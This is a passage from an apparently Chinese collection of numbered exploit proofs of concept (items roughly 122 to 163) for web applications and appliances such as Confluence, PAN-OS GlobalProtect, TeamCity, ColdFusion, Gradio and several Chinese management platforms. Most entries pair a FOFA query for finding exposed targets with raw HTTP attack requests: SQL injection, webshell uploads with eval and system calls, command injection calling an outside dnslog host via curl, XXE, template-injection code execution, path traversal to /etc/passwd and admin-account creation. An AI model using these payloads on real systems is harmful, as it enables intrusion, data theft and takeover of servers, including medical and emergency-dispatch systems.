Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart (北京百绰智能) s200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; the plaintext is sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin console directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
4 P! y2 V6 C$ D2 W$ V0 P, W<test>&t;</test>3 d* m( B5 v% C% V* v) {
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (福建科立迅) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kirisun (建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104 / DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
Affected models:
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. MetaCRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

The uploaded file is then served at http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS / Masa CMS processAsyncObject SQL injection (error-based probe)
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

Then call the uploaded web service: /1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 path traversal / arbitrary file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) smart parking fee system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> element sets the file name (path traversal is accepted) and <fileFlow> carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the uploaded file at http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The uploaded file is then served at http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 (Haoka Jituan) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

